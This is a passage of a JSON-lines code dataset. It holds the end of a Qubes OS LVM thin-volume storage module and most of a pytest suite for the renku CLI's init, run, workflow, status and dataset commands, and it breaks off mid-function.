qubes_lvm(cmd, self.log)\n        reset_cache()\n        return self\n\n    def remove(self):\n        assert self.vid\n        try:\n            if os.path.exists('/dev/' + self._vid_snap):\n                cmd = ['remove', self._vid_snap]\n                qubes_lvm(cmd, self.log)\n        except AttributeError:\n            pass\n\n        self._remove_revisions(self.revisions.keys())\n        if not os.path.exists(self.path):\n            return\n        cmd = ['remove', self.vid]\n        qubes_lvm(cmd, self.log)\n        reset_cache()\n        # pylint: disable=protected-access\n        self.pool._volume_objects_cache.pop(self.vid, None)\n\n    def export(self):\n        ''' Returns an object that can be `open()`. '''\n        # make sure the device node is available\n        qubes_lvm(['activate', self.vid], self.log)\n        devpath = '/dev/' + self.vid\n        return devpath\n\n    @asyncio.coroutine\n    def import_volume(self, src_volume):\n        if not src_volume.save_on_stop:\n            return self\n\n        # HACK: neat trick to speed up testing if you have same physical thin\n        # pool assigned to two qubes-pools i.e: qubes_dom0 and test-lvm\n        # pylint: disable=line-too-long\n        if isinstance(src_volume.pool, ThinPool) and \\\n                src_volume.pool.thin_pool == self.pool.thin_pool: # NOQA\n            cmd = ['remove', self.vid]\n            qubes_lvm(cmd, self.log)\n            cmd = ['clone', str(src_volume), str(self)]\n            qubes_lvm(cmd, self.log)\n        else:\n            if src_volume.size != self.size:\n                self.resize(src_volume.size)\n            src_path = src_volume.export()\n            cmd = ['dd', 'if=' + src_path, 'of=/dev/' + self.vid,\n                   'conv=sparse']\n            p = yield from asyncio.create_subprocess_exec(*cmd)\n            yield from p.wait()\n            if p.returncode != 0:\n                raise qubes.storage.StoragePoolException(\n                    'Failed to import volume {!r}, dd exit code: {}'.format(\n                        src_volume, p.returncode))\n            reset_cache()\n\n        return self\n\n    def import_data(self):\n        ''' Returns an object that can be `open()`. '''\n        devpath = '/dev/' + self.vid\n        return devpath\n\n    def is_dirty(self):\n        if self.save_on_stop:\n            return os.path.exists('/dev/' + self._vid_snap)\n        return False\n\n    def is_outdated(self):\n        if not self.snap_on_start:\n            return False\n        if self._vid_snap not in size_cache:\n            return False\n        return (size_cache[self._vid_snap]['origin'] !=\n                self.source.vid.split('/')[1])\n\n\n    def revert(self, revision=None):\n        if revision is None:\n            revision = \\\n                max(self.revisions.items(), key=operator.itemgetter(1))[0]\n        old_path = self.path + '-' + revision\n        if not os.path.exists(old_path):\n            msg = \"Volume {!s} has no {!s}\".format(self, old_path)\n            raise qubes.storage.StoragePoolException(msg)\n\n        cmd = ['remove', self.vid]\n        qubes_lvm(cmd, self.log)\n        cmd = ['clone', self.vid + '-' + revision, self.vid]\n        qubes_lvm(cmd, self.log)\n        reset_cache()\n        return self\n\n    def resize(self, size):\n        ''' Expands volume, throws\n            :py:class:`qubes.storage.StoragePoolException` if\n            given size is less than current_size\n        '''\n        if not self.rw:\n            msg = 'Cannot resize read-only volume {!s}'.format(self)\n            raise qubes.storage.StoragePoolException(msg)\n\n        if size < self.size:\n            raise qubes.storage.StoragePoolException(\n                'For your own safety, shrinking of %s is'\n                ' disabled (%d < %d). If you really know what you'\n                ' are doing, use `lvresize` on %s manually.' 
%\n                (self.name, size, self.size, self.vid))\n\n        if size == self.size:\n            return\n\n        if self.is_dirty():\n            cmd = ['extend', self._vid_snap, str(size)]\n            qubes_lvm(cmd, self.log)\n        elif self.save_on_stop or not self.snap_on_start:\n            cmd = ['extend', self.vid, str(size)]\n            qubes_lvm(cmd, self.log)\n        reset_cache()\n\n    def _snapshot(self):\n        try:\n            cmd = ['remove', self._vid_snap]\n            qubes_lvm(cmd, self.log)\n        except: # pylint: disable=bare-except\n            pass\n\n        if self.source is None:\n            cmd = ['clone', self.vid, self._vid_snap]\n        else:\n            cmd = ['clone', str(self.source), self._vid_snap]\n        qubes_lvm(cmd, self.log)\n\n\n    def start(self):\n        try:\n            if self.snap_on_start or self.save_on_stop:\n                if not self.save_on_stop or not self.is_dirty():\n                    self._snapshot()\n            else:\n                self._reset()\n        finally:\n            reset_cache()\n        return self\n\n    def stop(self):\n        try:\n            if self.save_on_stop:\n                self._commit()\n            if self.snap_on_start or self.save_on_stop:\n                cmd = ['remove', self._vid_snap]\n                qubes_lvm(cmd, self.log)\n            else:\n                cmd = ['remove', self.vid]\n                qubes_lvm(cmd, self.log)\n        finally:\n            reset_cache()\n        return self\n\n    def verify(self):\n        ''' Verifies the volume. '''\n        if not self.save_on_stop and not self.snap_on_start:\n            # volatile volumes don't need any files\n            return True\n        if self.source is not None:\n            vid = str(self.source)\n        else:\n            vid = self.vid\n        try:\n            vol_info = size_cache[vid]\n            if vol_info['attr'][4] != 'a':\n                raise qubes.storage.StoragePoolException(\n                    'volume {} not active'.format(vid))\n        except KeyError:\n            raise qubes.storage.StoragePoolException(\n                'volume {} missing'.format(vid))\n        return True\n\n\n    def block_device(self):\n        ''' Return :py:class:`qubes.storage.BlockDevice` for serialization in\n            the libvirt XML template as <disk>.\n        '''\n        if self.snap_on_start or self.save_on_stop:\n            return qubes.storage.BlockDevice(\n                '/dev/' + self._vid_snap, self.name, self.script,\n                self.rw, self.domain, self.devtype)\n\n        return super(ThinVolume, self).block_device()\n\n    @property\n    def usage(self): # lvm thin usage always returns at least the same usage as\n        # the parent\n        try:\n            return qubes.storage.lvm.size_cache[self.vid]['usage']\n        except KeyError:\n            return 0\n\n\ndef pool_exists(pool_id):\n    ''' Return true if pool exists '''\n    try:\n        vol_info = size_cache[pool_id]\n        return vol_info['attr'][0] == 't'\n    except KeyError:\n        return False\n\n\ndef qubes_lvm(cmd, log=logging.getLogger('qubes.storage.lvm')):\n    ''' Call :program:`lvm` to execute an LVM operation '''\n    action = cmd[0]\n    if action == 'remove':\n        lvm_cmd = ['lvremove', '-f', cmd[1]]\n    elif action == 'clone':\n        lvm_cmd = ['lvcreate', '-kn', '-ay', '-s', cmd[1], '-n', cmd[2]]\n    elif action == 'create':\n        lvm_cmd = ['lvcreate', '-T', cmd[1], '-kn', '-ay', '-n', cmd[2], '-V',\n                   str(cmd[3]) + 'B']\n    elif action == 'extend':\n        size = int(cmd[2]) / (1024 * 1024)\n        lvm_cmd = [\"lvextend\", \"-L%s\" % size, cmd[1]]\n    elif action == 'activate':\n        lvm_cmd = ['lvchange', '-ay', cmd[1]]\n    elif action == 'rename':\n        lvm_cmd = ['lvrename', cmd[1], cmd[2]]\n    else:\n        raise NotImplementedError('unsupported action: ' + action)\n    if lvm_is_very_old:\n        # old lvm in trusty image used there does not support -k option\n        lvm_cmd = [x for x in lvm_cmd if x != '-kn']\n    if os.getuid() != 0:\n        cmd = ['sudo', 'lvm'] + lvm_cmd\n    else:\n        cmd = ['lvm'] + lvm_cmd\n    environ = os.environ.copy()\n    environ['LC_ALL'] = 'C.utf8'\n    p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n                         close_fds=True, env=environ)\n    out, err = p.communicate()\n    return_code = p.returncode\n    if 
out:\n        log.debug(out)\n    if return_code == 0 and err:\n        log.warning(err)\n    elif return_code != 0:\n        assert err, \"Command exited unsuccessfully, but printed nothing to stderr\"\n        raise qubes.storage.StoragePoolException(err)\n    return True\n\n\ndef reset_cache():\n    qubes.storage.lvm.size_cache = init_cache()\n", "repo_name": "iamforprog/All_respository", "sub_path": "qubes/storage/lvm.py", "file_name": "lvm.py", "file_ext": "py", "file_size_in_byte": 18861, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "subprocess.check_output", "line_number": 18, "usage_type": "call"}, {"api_name": "subprocess.DEVNULL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "subprocess.CalledProcessError", "line_number": 21, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 26, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "qubes.utils.random_string", "line_number": 67, "usage_type": "call"}, {"api_name": "qubes.utils", "line_number": 67, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 84, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 84, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 87, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 87, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 132, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 140, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 146, "usage_type": "call"}, {"api_name": "os.getuid", "line_number": 150, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 152, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 152, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 159, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 159, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 180, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 188, "usage_type": "call"}, {"api_name": "qubes.storage.isodate", "line_number": 210, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 210, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 218, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 219, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 225, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 225, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 236, "usage_type": "attribute"}, {"api_name": "operator.itemgetter", "line_number": 253, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 262, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 320, "usage_type": "call"}, {"api_name": "os.path", "line_number": 320, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 327, "usage_type": "call"}, {"api_name": "os.path", "line_number": 327, "usage_type": "attribute"}, {"api_name": "asyncio.create_subprocess_exec", "line_number": 362, "usage_type": "call"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 365, "usage_type": "call"}, {"api_name": 
"qubes.storage", "line_number": 365, "usage_type": "attribute"}, {"api_name": "asyncio.coroutine", "line_number": 342, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 379, "usage_type": "call"}, {"api_name": "os.path", "line_number": 379, "usage_type": "attribute"}, {"api_name": "operator.itemgetter", "line_number": 394, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 396, "usage_type": "call"}, {"api_name": "os.path", "line_number": 396, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 398, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 398, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 414, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 414, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 417, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 417, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 485, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 485, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 488, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 488, "usage_type": "attribute"}, {"api_name": "qubes.storage.BlockDevice", "line_number": 498, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 498, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 508, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 522, "usage_type": "call"}, {"api_name": "os.getuid", "line_number": 544, "usage_type": "call"}, {"api_name": "os.environ.copy", "line_number": 548, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 548, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 550, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 550, "usage_type": "attribute"}, {"api_name": "qubes.storage.StoragePoolException", "line_number": 560, "usage_type": "call"}, {"api_name": "qubes.storage", "line_number": 560, "usage_type": "attribute"}, {"api_name": "qubes.storage", "line_number": 565, "usage_type": "attribute"}]} +{"seq_id": "19490090694", "text": "from __future__ import absolute_import, print_function\n\nimport contextlib\nimport os\nimport shutil\nimport sys\nfrom subprocess import call\n\nimport git\nimport pytest\nimport yaml\n\nfrom renku import __version__, cli\nfrom renku._compat import Path\nfrom renku.models.cwl.workflow import Workflow\n\n\ndef _run_update(runner, capsys, args=('update', )):\n \"\"\"Run the update command.\"\"\"\n with capsys.disabled():\n try:\n cli.cli.main(\n args=args,\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n return 0 if e.code is None else e.code\n except Exception:\n raise\n\n\ndef test_version(base_runner):\n \"\"\"Test cli version.\"\"\"\n result = base_runner.invoke(cli.cli, ['--version'])\n assert __version__ in result.output.split('\\n')\n\n\n@pytest.mark.parametrize('arg', (('help', ), ('-h', ), ('--help', )))\ndef test_help(arg, base_runner):\n \"\"\"Test cli help.\"\"\"\n result = base_runner.invoke(cli.cli, [arg])\n assert result.exit_code == 0\n assert 'Show this message and exit.' 
in result.output\n\n\ndef test_config_path(instance_path, base_runner):\n    \"\"\"Test config path.\"\"\"\n    result = base_runner.invoke(cli.cli, ['--config-path'])\n    output = result.output.split('\\n')[0]\n    assert 'config.yml' in output\n    assert instance_path in output\n\n\ndef test_init(base_runner):\n    \"\"\"Test project initialization.\"\"\"\n    runner = base_runner\n\n    # 1. the directory must exist\n    result = runner.invoke(cli.cli, ['init', 'test-project'])\n    assert result.exit_code == 2\n\n    # 2. test project directory creation\n    os.mkdir('test-project')\n    result = runner.invoke(cli.cli, ['init', 'test-project'])\n    assert result.exit_code == 0\n    assert os.stat(os.path.join('test-project', '.git'))\n    assert os.stat(os.path.join('test-project', '.renku'))\n\n    # 3. test project init from already existing renku repository\n    os.chdir('test-project')\n    result = runner.invoke(cli.cli, ['init'])\n    assert result.exit_code != 0\n\n    # 4. in case of init failure because of existing .git folder\n    # .renku directory should not exist\n    assert not os.path.exists(os.path.join('test-project', '.renku'))\n\n    result = runner.invoke(cli.cli, ['init', '--force'])\n    assert result.exit_code == 0\n    assert os.stat(os.path.join('.git'))\n    assert os.stat(os.path.join('.renku'))\n\n    # 5. check git lfs init options\n    os.chdir('../')\n    shutil.rmtree('test-project')\n    os.mkdir('test-project')\n    os.chdir('test-project')\n    result = runner.invoke(cli.cli, ['init', '--no-external-storage'])\n    with open('.git/config') as f:\n        config = f.read()\n    assert 'filter \"lfs\"' not in config\n\n    result = runner.invoke(cli.cli, ['init', '--force'])\n    with open('.git/config') as f:\n        config = f.read()\n    assert 'filter \"lfs\"' in config\n\n\ndef test_workon(runner):\n    \"\"\"Test switching branches.\"\"\"\n    # Create first issue\n    result = runner.invoke(cli.cli, ['workon', '1'])\n    assert result.exit_code == 0\n\n    result = runner.invoke(cli.cli, ['deactivate'])\n    assert result.exit_code == 0\n\n    # Enter existing\n    result = runner.invoke(cli.cli, ['workon', '1'])\n    assert result.exit_code == 0\n\n    result = runner.invoke(cli.cli, ['deactivate'])\n    assert result.exit_code == 0\n\n\ndef test_run_simple(runner):\n    \"\"\"Test tracking of run command.\"\"\"\n    cmd = ['echo', 'test']\n    result = runner.invoke(cli.cli, ['run', '--no-output'] + cmd)\n    assert result.exit_code == 0\n\n\ndef test_workflow(runner):\n    \"\"\"Test workflow command.\"\"\"\n    result = runner.invoke(cli.cli, ['run', 'touch', 'data.csv'])\n    assert result.exit_code == 0\n\n    with open('counted.txt', 'w') as stdout:\n        with contextlib.redirect_stdout(stdout):\n            try:\n                cli.cli.main(\n                    args=('run', 'wc', 'data.csv'),\n                    prog_name=runner.get_default_prog_name(cli.cli),\n                )\n            except SystemExit as e:\n                assert e.code in {None, 0}\n\n    result = runner.invoke(\n        cli.cli, ['workflow', 'create', 'counted.txt', '-o', 'workflow.cwl']\n    )\n    assert result.exit_code == 0\n\n    with open('workflow.cwl', 'r') as f:\n        workflow = Workflow.from_cwl(yaml.load(f))\n        assert workflow.steps[0].run.startswith('.renku/workflow/')\n\n    # Compare default log and log for a specific file.\n    result_default = runner.invoke(cli.cli, ['log'])\n    result_arg = runner.invoke(cli.cli, ['log', 'counted.txt'])\n\n    assert result_default.exit_code == 0\n    assert result_arg.exit_code == 0\n    assert result_default.output == result_arg.output\n\n\ndef test_streams(runner, capsys):\n    \"\"\"Test redirection of std streams.\"\"\"\n    repo = git.Repo('.')\n\n    with open('source.txt', 'w') as source:\n        source.write('first,second,third')\n\n    
repo.git.add('--all')\n repo.index.commit('Added source.txt')\n\n with capsys.disabled():\n with open('source.txt', 'rb') as stdin:\n with open('result.txt', 'wb') as stdout:\n try:\n old_stdin, old_stdout = sys.stdin, sys.stdout\n sys.stdin, sys.stdout = stdin, stdout\n try:\n cli.cli.main(\n args=('run', 'cut', '-d,', '-f', '2', '-s'),\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdin, sys.stdout = old_stdin, old_stdout\n\n with open('result.txt', 'r') as f:\n assert f.read().strip() == 'second'\n\n result = runner.invoke(cli.cli, ['workflow', 'create', 'result.txt'])\n assert result.exit_code == 0\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 0\n\n with open('source.txt', 'w') as source:\n source.write('first,second,third,fourth')\n\n repo.git.add('--all')\n repo.index.commit('Changed source.txt')\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 1\n assert 'source.txt' in result.output\n\n\ndef test_streams_cleanup(project, runner, capsys):\n \"\"\"Test cleanup of standard streams.\"\"\"\n with open('source.txt', 'w') as source:\n source.write('first,second,third')\n\n # File outside the Git index should be deleted.\n with capsys.disabled():\n with open('result.txt', 'wb') as stdout:\n try:\n old_stdout = sys.stdout\n sys.stdout = stdout\n try:\n cli.cli.main(\n args=('run', 'cat', 'source.txt'),\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 1}, 'The repo must be dirty.'\n finally:\n sys.stdout = old_stdout\n\n with open('source.txt', 'r') as source:\n assert source.read() == 'first,second,third'\n\n assert not Path('result.txt').exists()\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 1\n\n # File from the Git index should be restored.\n repo = git.Repo(project)\n with open('result.txt', 'w') as fp:\n fp.write('1')\n\n repo.index.add(['result.txt'])\n\n with capsys.disabled():\n with open('result.txt', 'wb') as stdout:\n try:\n old_stdout = sys.stdout\n sys.stdout = stdout\n try:\n cli.cli.main(\n args=('run', 'cat', 'source.txt'),\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 1}, 'The repo must be dirty.'\n finally:\n sys.stdout = old_stdout\n\n with open('result.txt', 'r') as fp:\n assert fp.read() == '1'\n\n\ndef test_update(project, runner, capsys):\n \"\"\"Test automatic file update.\"\"\"\n cwd = Path(project)\n data = cwd / 'data'\n source = cwd / 'source.txt'\n output = data / 'result.txt'\n\n repo = git.Repo(project)\n\n def update_source(data):\n \"\"\"Update source.txt.\"\"\"\n with source.open('w') as fp:\n fp.write(data)\n\n repo.git.add('--all')\n repo.index.commit('Updated source.txt')\n\n update_source('1')\n\n with capsys.disabled():\n with open(source, 'rb') as stdin:\n with open(output, 'wb') as stdout:\n try:\n old_stdin, old_stdout = sys.stdin, sys.stdout\n sys.stdin, sys.stdout = stdin, stdout\n\n try:\n cli.cli.main(\n args=('run', 'wc', '-c'),\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdin, sys.stdout = old_stdin, old_stdout\n\n with output.open('r') as f:\n assert f.read().strip() == '1'\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 0\n\n update_source('12')\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 1\n\n assert 
_run_update(runner, capsys) == 0\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 0\n\n with output.open('r') as f:\n assert f.read().strip() == '2'\n\n # Source has been updated but output is unchanged.\n update_source('34')\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 1\n\n assert _run_update(runner, capsys) == 0\n\n result = runner.invoke(cli.cli, ['status'])\n assert result.exit_code == 0\n\n with output.open('r') as f:\n assert f.read().strip() == '2'\n\n # Make sure the log contains the original parent.\n result = runner.invoke(cli.cli, ['log'])\n assert source.name in result.output\n\n\ndef test_streams_and_args_names(runner, capsys):\n \"\"\"Test streams and conflicting argument names.\"\"\"\n with capsys.disabled():\n with open('lalala', 'wb') as stdout:\n try:\n old_stdout = sys.stdout\n sys.stdout = stdout\n try:\n cli.cli.main(args=('run', 'echo', 'lalala'), )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdout = old_stdout\n\n with open('lalala', 'r') as f:\n assert f.read().strip() == 'lalala'\n\n result = runner.invoke(cli.cli, ['status'], catch_exceptions=False)\n assert result.exit_code == 0\n\n\ndef test_datasets(data_file, data_repository, runner):\n \"\"\"Test importing data into a dataset.\"\"\"\n # create a dataset\n result = runner.invoke(cli.cli, ['dataset', 'create', 'dataset'])\n assert result.exit_code == 0\n assert os.stat('data/dataset/metadata.yml')\n\n # add data\n result = runner.invoke(\n cli.cli, ['dataset', 'add', 'dataset',\n str(data_file)]\n )\n assert result.exit_code == 0\n assert os.stat(\n os.path.join('data', 'dataset', os.path.basename(data_file))\n )\n\n # add data from a git repo via http\n result = runner.invoke(\n cli.cli, [\n 'dataset', 'add', 'dataset', '--target', 'README.rst',\n 'https://github.com/SwissDataScienceCenter/renku-python.git'\n ]\n )\n assert result.exit_code == 0\n assert os.stat('data/dataset/renku-python/README.rst')\n\n # add data from local git repo\n result = runner.invoke(\n cli.cli, [\n 'dataset', 'add', 'dataset', '-t', 'file', '-t', 'file2',\n os.path.dirname(data_repository.git_dir)\n ]\n )\n assert result.exit_code == 0\n\n\ndef test_multiple_file_to_dataset(tmpdir, data_repository, runner):\n \"\"\"Test importing multiple data into a dataset at once.\"\"\"\n # create a dataset\n result = runner.invoke(cli.cli, ['dataset', 'create', 'dataset'])\n assert result.exit_code == 0\n assert os.stat('data/dataset/metadata.yml')\n\n paths = []\n for i in range(3):\n new_file = tmpdir.join('file_{0}'.format(i))\n new_file.write(str(i))\n paths.append(str(new_file))\n\n # add data\n result = runner.invoke(cli.cli, ['dataset', 'add', 'dataset'] + paths)\n assert result.exit_code == 0\n\n\ndef test_relative_import_to_dataset(tmpdir, data_repository, runner):\n \"\"\"Test importing data from a directory structure.\"\"\"\n # create a dataset\n result = runner.invoke(cli.cli, ['dataset', 'create', 'dataset'])\n assert result.exit_code == 0\n assert os.stat('data/dataset/metadata.yml')\n\n zero_data = tmpdir.join('data.txt')\n zero_data.write('zero')\n\n first_level = tmpdir.mkdir('first')\n second_level = first_level.mkdir('second')\n\n first_data = first_level.join('data.txt')\n first_data.write('first')\n\n second_data = second_level.join('data.txt')\n second_data.write('second')\n\n paths = [str(zero_data), str(first_data), str(second_data)]\n\n # add data in subdirectory\n result = runner.invoke(\n cli.cli,\n ['dataset', 'add', 'dataset', 
'--relative-to',\n str(tmpdir)] + paths,\n catch_exceptions=False,\n )\n assert result.exit_code == 0\n\n assert os.stat(os.path.join('data', 'dataset', 'data.txt'))\n assert os.stat(os.path.join('data', 'dataset', 'first', 'data.txt'))\n assert os.stat(\n os.path.join('data', 'dataset', 'first', 'second', 'data.txt')\n )\n\n\ndef test_relative_git_import_to_dataset(tmpdir, project, runner):\n \"\"\"Test importing data from a directory structure.\"\"\"\n submodule_name = os.path.basename(tmpdir)\n\n # create a dataset\n result = runner.invoke(cli.cli, ['dataset', 'create', 'dataset'])\n assert result.exit_code == 0\n assert os.stat('data/dataset/metadata.yml')\n\n data_repo = git.Repo.init(tmpdir)\n\n zero_data = tmpdir.join('data.txt')\n zero_data.write('zero')\n\n first_level = tmpdir.mkdir('first')\n second_level = first_level.mkdir('second')\n\n first_data = first_level.join('data.txt')\n first_data.write('first')\n\n second_data = second_level.join('data.txt')\n second_data.write('second')\n\n paths = [str(zero_data), str(first_data), str(second_data)]\n data_repo.index.add(paths)\n data_repo.index.commit('Added source files')\n\n # add data in subdirectory\n result = runner.invoke(\n cli.cli,\n [\n 'dataset', 'add', 'dataset', '--relative-to',\n str(first_level),\n str(tmpdir)\n ],\n catch_exceptions=False,\n )\n assert result.exit_code == 0\n\n assert os.stat(os.path.join('data', 'dataset', submodule_name, 'data.txt'))\n assert os.stat(\n os.path.join('data', 'dataset', submodule_name, 'second', 'data.txt')\n )\n\n # add data in subdirectory\n result = runner.invoke(\n cli.cli,\n ['dataset', 'add', 'relative', '--relative-to', 'first',\n str(tmpdir)],\n catch_exceptions=False,\n )\n assert result.exit_code == 0\n\n assert os.stat(\n os.path.join('data', 'relative', submodule_name, 'data.txt')\n )\n assert os.stat(\n os.path.join('data', 'relative', submodule_name, 'second', 'data.txt')\n )\n\n\ndef test_file_tracking(base_runner):\n \"\"\"Test .gitattribute handling on renku run.\"\"\"\n runner = base_runner\n\n os.mkdir('test-project')\n os.chdir('test-project')\n result = runner.invoke(cli.cli, ['init'])\n assert result.exit_code == 0\n\n result = runner.invoke(cli.cli, ['run', 'touch', 'output'])\n assert result.exit_code == 0\n\n with open('.gitattributes') as f:\n gitattributes = f.read()\n assert 'output' in gitattributes\n\n\ndef test_status_with_submodules(base_runner):\n \"\"\"Test status calculation with submodules.\"\"\"\n os.mkdir('foo')\n os.mkdir('bar')\n\n with open('woop', 'w') as f:\n f.write('woop')\n\n os.chdir('foo')\n result = base_runner.invoke(\n cli.cli, ['init', '-S'], catch_exceptions=False\n )\n assert result.exit_code == 0\n\n os.chdir('../bar')\n result = base_runner.invoke(\n cli.cli, ['init', '-S'], catch_exceptions=False\n )\n assert result.exit_code == 0\n\n os.chdir('../foo')\n result = base_runner.invoke(\n cli.cli, ['dataset', 'add', 'f', '../woop'], catch_exceptions=False\n )\n assert result.exit_code == 0\n\n os.chdir('../bar')\n result = base_runner.invoke(\n cli.cli, ['dataset', 'add', 'b', '../foo/data/f/woop'],\n catch_exceptions=False\n )\n assert result.exit_code == 0\n\n # Produce a derived data from the imported data.\n with open('woop.wc', 'w') as stdout:\n with contextlib.redirect_stdout(stdout):\n try:\n cli.cli.main(\n args=('run', 'wc', 'data/b/foo/data/f/woop'),\n prog_name=base_runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n\n result = base_runner.invoke(cli.cli, ['status'], 
catch_exceptions=False)\n    assert result.exit_code == 0\n\n    # Modify the source data.\n    os.chdir('../foo')\n    with open('data/f/woop', 'w') as f:\n        f.write('woop2')\n\n    call(['git', 'commit', '-am', 'committing changes to woop'])\n\n    os.chdir('../bar')\n    call(['git', 'submodule', 'update', '--rebase', '--remote'])\n    call(['git', 'commit', '-am', 'update submodule'])\n\n    result = base_runner.invoke(cli.cli, ['status'], catch_exceptions=False)\n    assert result.exit_code != 0\n\n\ndef test_unchanged_output(runner):\n    \"\"\"Test detection of unchanged output.\"\"\"\n    cmd = ['run', 'touch', '1']\n    result = runner.invoke(cli.cli, cmd)\n    assert result.exit_code == 0\n\n    cmd = ['run', 'touch', '1']\n    result = runner.invoke(cli.cli, cmd)\n    assert result.exit_code == 1\n\n\ndef test_unchanged_stdout(runner, capsys):\n    \"\"\"Test detection of unchanged stdout.\"\"\"\n    with capsys.disabled():\n        with open('output.txt', 'wb') as stdout:\n            try:\n                old_stdout = sys.stdout\n                sys.stdout = stdout\n                try:\n                    cli.cli.main(args=('run', 'echo', '1'), )\n                except SystemExit as e:\n                    assert e.code in {None, 0}\n            finally:\n                sys.stdout = old_stdout\n\n    with capsys.disabled():\n        with open('output.txt', 'wb') as stdout:\n            try:\n                old_stdout = sys.stdout\n                sys.stdout = stdout\n                try:\n                    cli.cli.main(args=('run', 'echo', '1'), )\n                except SystemExit as e:\n                    # The stdout has not been modified!\n                    assert e.code in {None, 1}\n            finally:\n                sys.stdout = old_stdout\n\n\ndef test_modified_output(project, runner, capsys):\n    \"\"\"Test detection of changed file as output.\"\"\"\n    cwd = Path(project)\n    source = cwd / 'source.txt'\n    output = cwd / 'result.txt'\n\n    repo = git.Repo(project)\n    cmd = ['run', 'cp', '-r', str(source), str(output)]\n\n    def update_source(data):\n        \"\"\"Update source.txt.\"\"\"\n        with source.open('w') as fp:\n            fp.write(data)\n\n        repo.git.add('--all')\n        repo.index.commit('Updated source.txt')\n\n    update_source('1')\n\n    # The output file does not exist.\n    assert not output.exists()\n\n    result = runner.invoke(cli.cli, cmd)\n    assert result.exit_code == 0\n\n    # The output file is copied from the source.\n    with output.open('r') as f:\n        assert f.read().strip() == '1'\n\n    update_source('2')\n\n    # The input file has been updated and output is recreated.\n    result = runner.invoke(cli.cli, cmd)\n    assert result.exit_code == 0\n\n    with output.open('r') as f:\n        assert f.read().strip() == '2'\n\n    update_source('3')\n\n    # The input has been modified and we check that the previous\n    # run command correctly recognized result.txt as its output.\n    assert _run_update(runner, capsys) == 0\n\n    with output.open('r') as f:\n        assert f.read().strip() == '3'\n\n\ndef test_siblings(runner):\n    \"\"\"Test detection of siblings.\"\"\"\n    siblings = {'brother', 'sister'}\n\n    cmd = ['run', 'touch'] + list(siblings)\n    result = runner.invoke(cli.cli, cmd)\n    assert result.exit_code == 0\n\n    for sibling in siblings:\n        cmd = ['show', 'siblings', sibling]\n        result = runner.invoke(cli.cli, cmd)\n        assert result.exit_code == 0\n\n        output = {\n            name.strip()\n            for name in result.output.split('\\n') if name.strip()\n        }\n        assert output == siblings, 'Checked {0}'.format(sibling)\n\n\ndef test_orphan(project, runner):\n    \"\"\"Test detection of an 